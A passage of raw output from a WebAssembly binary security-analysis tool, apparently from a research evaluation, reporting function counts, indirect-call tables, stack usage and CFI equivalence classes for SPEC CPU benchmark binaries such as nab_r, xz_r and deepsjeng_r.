141 |   type: [i32, i64] -> [i64], start idx: Some(19), end idx: Some(19), size (of class): 1, count (how often class appears: 5
142 |   type: [i32, i64, i32] -> [i64], start idx: Some(20), end idx: Some(23), size (of class): 3, count (how often class appears: 1
143 |   type: [i32] -> [i32], start idx: Some(0), end idx: Some(3), size (of class): 3, count (how often class appears: 1
144 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: Some(5), end idx: Some(5), size (of class): 1, count (how often class appears: 1
145 |   type: [i32, i32] -> [i32], start idx: Some(6), end idx: Some(9), size (of class): 3, count (how often class appears: 28
146 | 
147 | latex CFI table line for this program: C & 24.9k & 350 & 44 & 11.17\% & 127 & 20 & 15.7\% & 12 & 10.6\% & 678 & 139 & 20.5\% & 132 & 19.5\% && 13 & 1.9\%
148 | 
149 | class;size;count
150 | 0;5;7
151 | 1;1;1
152 | 2;1;5
153 | 3;3;1
154 | 4;3;1
155 | 5;1;1
156 | 6;3;28
157 | total classes: 7
158 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/fastcomp/nab_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | Functions:       249
  2 |   Imported:       14
  3 |   Non-imported:  235
  4 | 
  5 | Tables: 1 (should be 1 in Wasm v1)
  6 |   Table entries at init:        24
  7 |   Of those, unique functions:   19 (i.e., at least 7.63% of all functions can be called indirectly, because they are in the [indirect call] table)
  8 | 
  9 | Globals:
 10 |   #0 i32
 11 |      import: env.__table_base
 12 |        0 × global.get     0 × global.set     0 total
 13 |   #1 f64
 14 |      import: global.NaN
 15 |        5 × global.get     0 × global.set     5 total (100/0% split)
 16 |   #2 f64
 17 |      import: global.Infinity
 18 |        1 × global.get     0 × global.set     1 total (100/0% split)
 19 |   #3 i32
 20 |      init: i32.const 185456
 21 |      135 × global.get   158 × global.set   293 total (46/54% split)
 22 | 
 23 | Likely the stack pointer:       Global #3
 24 | Functions using stack pointer:   67 (28.51% of all non-imported functions)
 25 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 26 |     1  (0.43%) × [96]
 27 |     1  (0.43%) × [160]
 28 |     1  (0.43%) × [208]
 29 |     1  (0.43%) × [224]
 30 |     1  (0.43%) × [320]
 31 |     1  (0.43%) × [464]
 32 |     1  (0.43%) × [512]
 33 |     1  (0.43%) × [1056]
 34 |     1  (0.43%) × [1200]
 35 |     2  (0.85%) × [144]
 36 |     2  (0.85%) × [240]
 37 |     2  (0.85%) × [256]
 38 |     2  (0.85%) × [288]
 39 |     2  (0.85%) × [560]
 40 |     3  (1.28%) × [48]
 41 |    11  (4.68%) × [32]
 42 |    30 (12.77%) × [16]
 43 | 
 44 | Counts of function types (39 unique types):
 45 |     1  (0.40%) × [] -> [f64]
 46 |     1  (0.40%) × [i32] -> [f64]
 47 |     1  (0.40%) × [i32, i32] -> [f64]
 48 |     1  (0.40%) × [i32, i32, i32, i32, i32] -> [f64]
 49 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32] -> []
 50 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32] -> [i32]
 51 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32] -> [f64]
 52 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32, i32] -> [i32]
 53 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
 54 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32, i32, i32] -> [f64]
 55 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [f64]
 56 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [f64]
 57 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32, i32] -> []
 58 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32, i32, i32, f64, f64] -> []
 59 |     1  (0.40%) × [i32, i32, i32, i32, i32, i32, i32, i32, f64, f64, i32, i32] -> []
 60 |     1  (0.40%) × [i32, i32, i64] -> []
 61 |     1  (0.40%) × [i32, i64] -> []
 62 |     1  (0.40%) × [i64, i32, i32] -> [i32]
 63 |     1  (0.40%) × [f64, i32] -> [i32]
 64 |     1  (0.40%) × [f64, f64, i32] -> [f64]
 65 |     2  (0.80%) × [i32, i32] -> [i64]
 66 |     2  (0.80%) × [i32, i32, i32, i32, i32] -> []
 67 |     2  (0.80%) × [i32, f64, i32, i32, i32, i32] -> [i32]
 68 |     2  (0.80%) × [i64, i32] -> [i32]
 69 |     3  (1.20%) × [i32, i64, i32] -> [i64]
 70 |     3  (1.20%) × [f64, i32] -> [f64]
 71 |     3  (1.20%) × [f64, f64] -> [f64]
 72 |     4  (1.61%) × [i32, i32, i32] -> [f64]
 73 |     5  (2.01%) × [] -> []
 74 |     6  (2.41%) × [f64] -> [f64]
 75 |     7  (2.81%) × [i32, i32, i32, i32, i32] -> [i32]
 76 |    11  (4.42%) × [] -> [i32]
 77 |    11  (4.42%) × [i32, i32, i32, i32] -> [i32]
 78 |    18  (7.23%) × [i32, i32] -> []
 79 |    18  (7.23%) × [i32, i32, i32] -> []
 80 |    21  (8.43%) × [i32] -> []
 81 |    25 (10.04%) × [i32, i32, i32] -> [i32]
 82 |    39 (15.66%) × [i32, i32] -> [i32]
 83 |    47 (18.88%) × [i32] -> [i32]
 84 | 
 85 | 
 86 | Functions with at least one call_indirect: 13 (5.53% of all functions)
 87 | 
 88 | Table elements initialization:
 89 |          range: [    0,    1]   length:   2   unique funcs:    2   type: [i32, i32, i32] -> [f64]
 90 |          range: [    2,    5]   length:   4   unique funcs:    3   type: [i32] -> [i32]
 91 |          range: [    6,    7]   length:   2   unique funcs:    2   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 92 |          range: [    8,    9]   length:   2   unique funcs:    2   type: [i32, i32] -> [i32]
 93 |          range: [   10,   17]   length:   8   unique funcs:    5   type: [i32, i32, i32] -> [i32]
 94 |          range: [   18,   21]   length:   4   unique funcs:    3   type: [i32, i64, i32] -> [i64]
 95 |          range: [   22,   23]   length:   2   unique funcs:    2   type: [i32, i32] -> []
 96 |   7 table init ranges in total
 97 | 
 98 | Patterns (=preceding instructions) of call_indirect:
 99 |      7 × fixed index:      1                  source:  i32.const   type: [i32, i32, i32] -> [f64]
100 |          functions matching by type (regardless whether they are in the table):                4
101 |          functions matching by type and present in table (regardless at which table index):    2
102 |          functions matching by type and present in permissable table index range:              1
103 |      1 × range: [    2,    5]   length:   4   source:   i32.load   type: [i32] -> [i32]
104 |          functions matching by type (regardless whether they are in the table):               47
105 |          functions matching by type and present in table (regardless at which table index):    3
106 |          functions matching by type and present in permissable table index range:              3
107 |      1 × fixed index:      7                  source:  i32.const   type: [i32, f64, i32, i32, i32, i32] -> [i32]
108 |          functions matching by type (regardless whether they are in the table):                2
109 |          functions matching by type and present in table (regardless at which table index):    2
110 |          functions matching by type and present in permissable table index range:              1
111 |      7 × fixed index:      9                  source:  i32.const   type: [i32, i32] -> [i32]
112 |          functions matching by type (regardless whether they are in the table):               39
113 |          functions matching by type and present in table (regardless at which table index):    2
114 |          functions matching by type and present in permissable table index range:              1
115 |      2 × range: [   10,   17]   length:   8   source:   i32.load   type: [i32, i32, i32] -> [i32]
116 |          functions matching by type (regardless whether they are in the table):               25
117 |          functions matching by type and present in table (regardless at which table index):    5
118 |          functions matching by type and present in permissable table index range:              5
119 |      6 × range: [   10,   17]   length:   8   source:  local.get   type: [i32, i32, i32] -> [i32]
120 |          functions matching by type (regardless whether they are in the table):               25
121 |          functions matching by type and present in table (regardless at which table index):    5
122 |          functions matching by type and present in permissable table index range:              5
123 |      1 × range: [   18,   21]   length:   4   source:   i32.load   type: [i32, i64, i32] -> [i64]
124 |          functions matching by type (regardless whether they are in the table):                3
125 |          functions matching by type and present in table (regardless at which table index):    3
126 |          functions matching by type and present in permissable table index range:              3
127 |      1 × range: [   18,   21]   length:   4   source:  local.get   type: [i32, i64, i32] -> [i64]
128 |          functions matching by type (regardless whether they are in the table):                3
129 |          functions matching by type and present in table (regardless at which table index):    3
130 |          functions matching by type and present in permissable table index range:              3
131 |      1 × fixed index:     23                  source:  i32.const   type: [i32, i32] -> []
132 |          functions matching by type (regardless whether they are in the table):               18
133 |          functions matching by type and present in table (regardless at which table index):    2
134 |          functions matching by type and present in permissable table index range:              1
135 |   9 call_indirect patterns in total
136 | 
137 | function #100 is indirectly called with a fixed table index
138 |   local.get 0
139 |   local.get 1
140 |   local.get 2
141 |   ...
142 | function #174 is indirectly called with a fixed table index
143 |   global.get 3
144 |   local.set 21
145 |   global.get 3
146 |   ...
147 | function #217 is indirectly called with a fixed table index
148 |   local.get 0
149 |   i32.load align=2
150 |   i32.load align=2
151 |   ...
152 | function #173 is indirectly called with a fixed table index
153 |   local.get 1
154 |   i32.load align=2
155 |   i32.const 7
156 |   ...
157 | 
158 | call_indirect target equivalence classes (CFI equivalence classes):
159 |   type: [i32, i32, i32] -> [f64], start idx: Some(1), end idx: Some(1), size (of class): 1, count (how often class appears: 7
160 |   type: [i32, i32] -> [], start idx: Some(23), end idx: Some(23), size (of class): 1, count (how often class appears: 1
161 |   type: [i32, i32] -> [i32], start idx: Some(9), end idx: Some(9), size (of class): 1, count (how often class appears: 7
162 |   type: [i32, i64, i32] -> [i64], start idx: Some(18), end idx: Some(21), size (of class): 3, count (how often class appears: 2
163 |   type: [i32] -> [i32], start idx: Some(2), end idx: Some(5), size (of class): 3, count (how often class appears: 1
164 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: Some(7), end idx: Some(7), size (of class): 1, count (how often class appears: 1
165 |   type: [i32, i32, i32] -> [i32], start idx: Some(10), end idx: Some(17), size (of class): 5, count (how often class appears: 8
166 | 
167 | latex CFI table line for this program: C & 61.2k & 1.6k & 27 & 1.62\% & 249 & 19 & 7.6\% & 13 & 5.5\% & 574 & 81 & 14.1\% & 65 & 11.3\% && 16 & 2.8\%
168 | 
169 | class;size;count
170 | 0;1;7
171 | 1;1;1
172 | 2;1;7
173 | 3;3;2
174 | 4;3;1
175 | 5;1;1
176 | 6;5;8
177 | total classes: 7
178 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/fastcomp/xz_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | Functions:       275
  2 |   Imported:       13
  3 |   Non-imported:  262
  4 | 
  5 | Tables: 1 (should be 1 in Wasm v1)
  6 |   Table entries at init:       156
  7 |   Of those, unique functions:  114 (i.e., at least 41.45% of all functions can be called indirectly, because they are in the [indirect call] table)
  8 | 
  9 | Globals:
 10 |   #0 i32
 11 |      import: env.__table_base
 12 |        0 × global.get     0 × global.set     0 total
 13 |   #1 i32
 14 |      init: i32.const 37520
 15 |      115 × global.get   192 × global.set   307 total (37/63% split)
 16 | 
 17 | Likely the stack pointer:       Global #1
 18 | Functions using stack pointer:   57 (21.76% of all non-imported functions)
 19 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 20 |     1  (0.38%) × [128]
 21 |     1  (0.38%) × [192]
 22 |     1  (0.38%) × [208]
 23 |     1  (0.38%) × [224]
 24 |     1  (0.38%) × [256]
 25 |     1  (0.38%) × [560]
 26 |     1  (0.38%) × [704]
 27 |     1  (0.38%) × [2176]
 28 |     1  (0.38%) × [2352]
 29 |     2  (0.76%) × [144]
 30 |     3  (1.15%) × [48]
 31 |     3  (1.15%) × [80]
 32 |     3  (1.15%) × [96]
 33 |     5  (1.91%) × [32]
 34 |    27 (10.31%) × [16]
 35 | 
 36 | Counts of function types (32 unique types):
 37 |     1  (0.36%) × [i32, i32, i32] -> [i64]
 38 |     1  (0.36%) × [i32, i32, i32, i32] -> [i64]
 39 |     1  (0.36%) × [i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
 40 |     1  (0.36%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
 41 |     1  (0.36%) × [i32, i32, i64] -> [i64]
 42 |     1  (0.36%) × [i32, i32, i64, i64] -> [i32]
 43 |     1  (0.36%) × [i32, i64, i64] -> [i32]
 44 |     1  (0.36%) × [i64, i32, i32] -> [i32]
 45 |     1  (0.36%) × [i64, i32, i32, i32, i32] -> [i32]
 46 |     1  (0.36%) × [f64, i32] -> [f64]
 47 |     2  (0.73%) × [i32, i32, i32, i32, i32, i32] -> [i32]
 48 |     2  (0.73%) × [i32, i32, i32, i64] -> [i32]
 49 |     2  (0.73%) × [i32, i64] -> []
 50 |     2  (0.73%) × [i32, f64, i32, i32, i32, i32] -> [i32]
 51 |     2  (0.73%) × [i64, i32] -> [i32]
 52 |     3  (1.09%) × [] -> []
 53 |     3  (1.09%) × [] -> [i32]
 54 |     3  (1.09%) × [i32, i32, i32, i32] -> []
 55 |     3  (1.09%) × [i32, i32, i32, i32, i32] -> []
 56 |     3  (1.09%) × [i32, i32, i64, i32] -> [i32]
 57 |     3  (1.09%) × [i32, i64, i32] -> [i64]
 58 |     4  (1.45%) × [i64] -> [i32]
 59 |    10  (3.64%) × [i32, i32, i32] -> []
 60 |    11  (4.00%) × [i32] -> [i64]
 61 |    11  (4.00%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
 62 |    15  (5.45%) × [i32, i32, i32, i32, i32] -> [i32]
 63 |    16  (5.82%) × [i32] -> []
 64 |    24  (8.73%) × [i32, i32, i32, i32] -> [i32]
 65 |    27  (9.82%) × [i32] -> [i32]
 66 |    37 (13.45%) × [i32, i32] -> []
 67 |    39 (14.18%) × [i32, i32, i32] -> [i32]
 68 |    43 (15.64%) × [i32, i32] -> [i32]
 69 | 
 70 | 
 71 | Functions with at least one call_indirect: 44 (16.79% of all functions)
 72 | 
 73 | Table elements initialization:
 74 |          range: [    0,    3]   length:   4   unique funcs:    4   type: [i32] -> [i32]
 75 |          range: [    4,    5]   length:   2   unique funcs:    2   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 76 |          range: [    6,   21]   length:  16   unique funcs:   12   type: [i32, i32] -> [i32]
 77 |          range: [   22,   53]   length:  32   unique funcs:   23   type: [i32, i32, i32] -> [i32]
 78 |          range: [   54,   69]   length:  16   unique funcs:   14   type: [i32, i32, i32, i32] -> [i32]
 79 |          range: [   70,   85]   length:  16   unique funcs:   11   type: [i32, i32, i32, i32, i32] -> [i32]
 80 |          range: [   86,  101]   length:  16   unique funcs:   11   type: [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
 81 |          range: [  102,  103]   length:   2   unique funcs:    2   type: [i32, i32, i32, i64] -> [i32]
 82 |          range: [  104,  105]   length:   2   unique funcs:    2   type: [i32, i32, i64, i32] -> [i32]
 83 |          range: [  106,  109]   length:   4   unique funcs:    3   type: [i64] -> [i32]
 84 |          range: [  110,  117]   length:   8   unique funcs:    6   type: [i32] -> [i64]
 85 |          range: [  118,  121]   length:   4   unique funcs:    3   type: [i32, i64, i32] -> [i64]
 86 |          range: [  122,  153]   length:  32   unique funcs:   19   type: [i32, i32] -> []
 87 |          range: [  154,  155]   length:   2   unique funcs:    2   type: [i32, i64] -> []
 88 |   14 table init ranges in total
 89 | 
 90 | Patterns (=preceding instructions) of call_indirect:
 91 |      2 × range: [    0,    3]   length:   4   source:  local.get   type: [i32] -> [i32]
 92 |          functions matching by type (regardless whether they are in the table):               27
 93 |          functions matching by type and present in table (regardless at which table index):    4
 94 |          functions matching by type and present in permissable table index range:              4
 95 |      1 × fixed index:      5                  source:  i32.const   type: [i32, f64, i32, i32, i32, i32] -> [i32]
 96 |          functions matching by type (regardless whether they are in the table):                2
 97 |          functions matching by type and present in table (regardless at which table index):    2
 98 |          functions matching by type and present in permissable table index range:              1
 99 |      4 × range: [    6,   21]   length:  16   source:  local.get   type: [i32, i32] -> [i32]
100 |          functions matching by type (regardless whether they are in the table):               43
101 |          functions matching by type and present in table (regardless at which table index):   12
102 |          functions matching by type and present in permissable table index range:             12
103 |      2 × range: [   22,   53]   length:  32   source:   i32.load   type: [i32, i32, i32] -> [i32]
104 |          functions matching by type (regardless whether they are in the table):               39
105 |          functions matching by type and present in table (regardless at which table index):   23
106 |          functions matching by type and present in permissable table index range:             23
107 |      8 × range: [   22,   53]   length:  32   source:  local.get   type: [i32, i32, i32] -> [i32]
108 |          functions matching by type (regardless whether they are in the table):               39
109 |          functions matching by type and present in table (regardless at which table index):   23
110 |          functions matching by type and present in permissable table index range:             23
111 |      5 × range: [   54,   69]   length:  16   source:  local.get   type: [i32, i32, i32, i32] -> [i32]
112 |          functions matching by type (regardless whether they are in the table):               24
113 |          functions matching by type and present in table (regardless at which table index):   14
114 |          functions matching by type and present in permissable table index range:             14
115 |      6 × range: [   70,   85]   length:  16   source:  local.get   type: [i32, i32, i32, i32, i32] -> [i32]
116 |          functions matching by type (regardless whether they are in the table):               15
117 |          functions matching by type and present in table (regardless at which table index):   11
118 |          functions matching by type and present in permissable table index range:             11
119 |      5 × range: [   86,  101]   length:  16   source:   i32.load   type: [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
120 |          functions matching by type (regardless whether they are in the table):               11
121 |          functions matching by type and present in table (regardless at which table index):   11
122 |          functions matching by type and present in permissable table index range:             11
123 |      7 × range: [   86,  101]   length:  16   source:  local.get   type: [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
124 |          functions matching by type (regardless whether they are in the table):               11
125 |          functions matching by type and present in table (regardless at which table index):   11
126 |          functions matching by type and present in permissable table index range:             11
127 |      4 × range: [  106,  109]   length:   4   source:  local.get   type: [i64] -> [i32]
128 |          functions matching by type (regardless whether they are in the table):                4
129 |          functions matching by type and present in table (regardless at which table index):    3
130 |          functions matching by type and present in permissable table index range:              3
131 |      1 × fixed index:    108                  source:  i32.const   type: [i64] -> [i32]
132 |          functions matching by type (regardless whether they are in the table):                4
133 |          functions matching by type and present in table (regardless at which table index):    3
134 |          functions matching by type and present in permissable table index range:              1
135 |      1 × range: [  110,  117]   length:   8   source:  local.get   type: [i32] -> [i64]
136 |          functions matching by type (regardless whether they are in the table):               11
137 |          functions matching by type and present in table (regardless at which table index):    6
138 |          functions matching by type and present in permissable table index range:              6
139 |      1 × range: [  118,  121]   length:   4   source:  local.get   type: [i32, i64, i32] -> [i64]
140 |          functions matching by type (regardless whether they are in the table):                3
141 |          functions matching by type and present in table (regardless at which table index):    3
142 |          functions matching by type and present in permissable table index range:              3
143 |     21 × range: [  122,  153]   length:  32   source:  local.get   type: [i32, i32] -> []
144 |          functions matching by type (regardless whether they are in the table):               37
145 |          functions matching by type and present in table (regardless at which table index):   19
146 |          functions matching by type and present in permissable table index range:             19
147 |      1 × fixed index:    141                  source:  i32.const   type: [i32, i32] -> []
148 |          functions matching by type (regardless whether they are in the table):               37
149 |          functions matching by type and present in table (regardless at which table index):   19
150 |          functions matching by type and present in permissable table index range:              1
151 |      1 × range: [  154,  155]   length:   2   source:  local.get   type: [i32, i64] -> []
152 |          functions matching by type (regardless whether they are in the table):                2
153 |          functions matching by type and present in table (regardless at which table index):    2
154 |          functions matching by type and present in permissable table index range:              2
155 |   16 call_indirect patterns in total
156 | 
157 | function #193 is indirectly called with a fixed table index
158 |   global.get 1
159 |   local.set 21
160 |   global.get 1
161 |   ...
162 | function #147 is indirectly called with a fixed table index
163 |   block
164 |   block
165 |   local.get 0
166 |   ...
167 | function #192 is indirectly called with a fixed table index
168 |   local.get 1
169 |   i32.load align=2
170 |   i32.const 7
171 |   ...
172 | 
173 | call_indirect target equivalence classes (CFI equivalence classes):
174 |   type: [i32] -> [i64], start idx: Some(110), end idx: Some(117), size (of class): 6, count (how often class appears: 1
175 |   type: [i32, i32] -> [], start idx: Some(122), end idx: Some(153), size (of class): 19, count (how often class appears: 21
176 |   type: [i32, i32] -> [], start idx: Some(141), end idx: Some(141), size (of class): 1, count (how often class appears: 1
177 |   type: [i32, i32, i32, i32, i32] -> [i32], start idx: Some(70), end idx: Some(85), size (of class): 11, count (how often class appears: 6
178 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: Some(5), end idx: Some(5), size (of class): 1, count (how often class appears: 1
179 |   type: [i32, i32] -> [i32], start idx: Some(6), end idx: Some(21), size (of class): 12, count (how often class appears: 4
180 |   type: [i32, i32, i32] -> [i32], start idx: Some(22), end idx: Some(53), size (of class): 23, count (how often class appears: 10
181 |   type: [i64] -> [i32], start idx: Some(106), end idx: Some(109), size (of class): 3, count (how often class appears: 4
182 |   type: [i64] -> [i32], start idx: Some(108), end idx: Some(108), size (of class): 1, count (how often class appears: 1
183 |   type: [i32, i64] -> [], start idx: Some(154), end idx: Some(155), size (of class): 2, count (how often class appears: 1
184 |   type: [i32] -> [i32], start idx: Some(0), end idx: Some(3), size (of class): 4, count (how often class appears: 2
185 |   type: [i32, i64, i32] -> [i64], start idx: Some(118), end idx: Some(121), size (of class): 3, count (how often class appears: 1
186 |   type: [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [i32], start idx: Some(86), end idx: Some(101), size (of class): 11, count (how often class appears: 12
187 |   type: [i32, i32, i32, i32] -> [i32], start idx: Some(54), end idx: Some(69), size (of class): 14, count (how often class appears: 5
188 | 
189 | latex CFI table line for this program: C & 69.3k & 641 & 70 & 9.85\% & 275 & 114 & 41.5\% & 44 & 16.8\% & 1.8k & 1000 & 55.2\% & 979 & 54.1\% && 101 & 5.6\%
190 | 
191 | class;size;count
192 | 0;6;1
193 | 1;19;21
194 | 2;1;1
195 | 3;11;6
196 | 4;1;1
197 | 5;12;4
198 | 6;23;10
199 | 7;3;4
200 | 8;1;1
201 | 9;2;1
202 | 10;4;2
203 | 11;3;1
204 | 12;11;12
205 | 13;14;5
206 | total classes: 14
207 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/raw-tool-output/spec-cpu/upstream/deepsjeng_r.wasm.security-analysis.txt:
--------------------------------------------------------------------------------
  1 | filename: ./531.deepsjeng_r/deepsjeng_r.wasm
  2 |   benchmark: 531.deepsjeng_r
  3 |   binary:    deepsjeng_r.wasm
  4 | 
  5 | Functions:       174
  6 |   Imported:       12
  7 |   Non-imported:  162
  8 |   Exported:        5
  9 | 
 10 | Tables: 1 (should be 1 in Wasm v1)
 11 |   Table entries at init:        10
 12 |   Of those, unique functions:   10 (i.e., at least 5.75% of all functions can be called indirectly, because they are in the [indirect call] table)
 13 | 
 14 | Instructions:     52981
 15 |   call:             888 (1.68% of all instructions)
 16 |   call_indirect:     10 (0.02% of all, 1.11% of all calls)
 17 | 
 18 | Globals:
 19 |   #0 i32
 20 |      init: i32.const 17392176
 21 |       63 × global.get   124 × global.set   187 total (34/66% split)
 22 | 
 23 | Likely the stack pointer:       Global #0
 24 | Functions using stack pointer:   63 (38.89% of all non-imported functions)
 25 | Stack increments: (How many functions increment the stack pointer by how much? Can also handle multiple increments per function, that's why it is an array of increments.)
 26 |     1  (0.62%) × [-8960]
 27 |     1  (0.62%) × [-2928]
 28 |     1  (0.62%) × [-2464]
 29 |     1  (0.62%) × [-2096]
 30 |     1  (0.62%) × [-2080]
 31 |     1  (0.62%) × [-1936]
 32 |     1  (0.62%) × [-1488]
 33 |     1  (0.62%) × [-1152]
 34 |     1  (0.62%) × [-1120]
 35 |     1  (0.62%) × [-976]
 36 |     1  (0.62%) × [-656]
 37 |     1  (0.62%) × [-640]
 38 |     1  (0.62%) × [-432]
 39 |     1  (0.62%) × [-336]
 40 |     1  (0.62%) × [-304]
 41 |     1  (0.62%) × [-256]
 42 |     1  (0.62%) × [-208]
 43 |     1  (0.62%) × [-192]
 44 |     1  (0.62%) × [-160]
 45 |     1  (0.62%) × [-144]
 46 |     1  (0.62%) × [-112]
 47 |     2  (1.23%) × [-560]
 48 |     2  (1.23%) × [-128]
 49 |     2  (1.23%) × [-96]
 50 |     2  (1.23%) × [-80]
 51 |     3  (1.85%) × [-48]
 52 |     4  (2.47%) × [-32]
 53 |    25 (15.43%) × [-16]
 54 |   101 (62.35%) × []
 55 |   functions with stack allocation total: 61 (37.65%)
 56 | 
 57 | csv lines to extract for sp analysis and plots:
 58 | benchmark,binary,funccount,percent,sp_increments,increment_sum,increment_sum_abs
 59 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-8960]",-8960,8960
 60 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-2928]",-2928,2928
 61 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-2464]",-2464,2464
 62 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-2096]",-2096,2096
 63 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-2080]",-2080,2080
 64 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-1936]",-1936,1936
 65 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-1488]",-1488,1488
 66 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-1152]",-1152,1152
 67 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-1120]",-1120,1120
 68 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-976]",-976,976
 69 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-656]",-656,656
 70 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-640]",-640,640
 71 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-432]",-432,432
 72 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-336]",-336,336
 73 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-304]",-304,304
 74 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-256]",-256,256
 75 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-208]",-208,208
 76 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-192]",-192,192
 77 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-160]",-160,160
 78 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-144]",-144,144
 79 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",1,0.61728394,"[-112]",-112,112
 80 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",2,1.2345679,"[-560]",-560,560
 81 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",2,1.2345679,"[-128]",-128,128
 82 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",2,1.2345679,"[-96]",-96,96
 83 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",2,1.2345679,"[-80]",-80,80
 84 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",3,1.8518518,"[-48]",-48,48
 85 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",4,2.4691358,"[-32]",-32,32
 86 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",25,15.432098,"[-16]",-16,16
 87 | sp_csv_line:"531.deepsjeng_r","deepsjeng_r.wasm",101,62.34568,"[]",0,0
 88 | 
 89 | Counts of function types (38 unique types):
 90 |     1  (0.57%) × [i32] -> [i64]
 91 |     1  (0.57%) × [i32] -> [f64]
 92 |     1  (0.57%) × [i32, i32, i32, i32, i32, i32] -> []
 93 |     1  (0.57%) × [i32, i32, i32, i32, i32, i32] -> [i32]
 94 |     1  (0.57%) × [i32, i32, i32, i32, i32, i32, i32] -> [i32]
 95 |     1  (0.57%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> []
 96 |     1  (0.57%) × [i32, i32, i32, i32, i32, i32, i32, i32, i32] -> [i32]
 97 |     1  (0.57%) × [i32, i32, i64] -> []
 98 |     1  (0.57%) × [i32, i64] -> []
 99 |     1  (0.57%) × [i32, i64, i64] -> []
100 |     1  (0.57%) × [i32, f32] -> []
101 |     1  (0.57%) × [i32, f64] -> []
102 |     1  (0.57%) × [i32, f64, i32, i32, i32, i32] -> [i32]
103 |     1  (0.57%) × [i64, i32, i32] -> [i32]
104 |     1  (0.57%) × [i64, i64] -> [f32]
105 |     1  (0.57%) × [i64, i64] -> [f64]
106 |     1  (0.57%) × [i64, i64, i64, i64] -> [i32]
107 |     1  (0.57%) × [f64, i32] -> [f64]
108 |     2  (1.15%) × [i32, i64, i32] -> [i64]
109 |     2  (1.15%) × [i64] -> [i32]
110 |     2  (1.15%) × [i64, i32] -> [i32]
111 |     2  (1.15%) × [i64, i64] -> [i32]
112 |     3  (1.72%) × [i32, i32, i32, i32] -> []
113 |     3  (1.72%) × [i32, i32, i32, i32, i32] -> [i32]
114 |     3  (1.72%) × [i32, i64, i64, i32] -> []
115 |     4  (2.30%) × [i32, i32] -> [i64]
116 |     4  (2.30%) × [i32, i32, i32, i32] -> [i32]
117 |     4  (2.30%) × [i32, i32, i32, i32, i32] -> []
118 |     4  (2.30%) × [i64, i32] -> [i64]
119 |     5  (2.87%) × [] -> [i32]
120 |     6  (3.45%) × [i32, i64, i64, i64, i64] -> []
121 |     8  (4.60%) × [i32] -> []
122 |    12  (6.90%) × [i32, i32] -> []
123 |    13  (7.47%) × [i32, i32, i32] -> [i32]
124 |    14  (8.05%) × [i32, i32, i32] -> []
125 |    15  (8.62%) × [] -> []
126 |    24 (13.79%) × [i32, i32] -> [i32]
127 |    26 (14.94%) × [i32] -> [i32]
128 | 
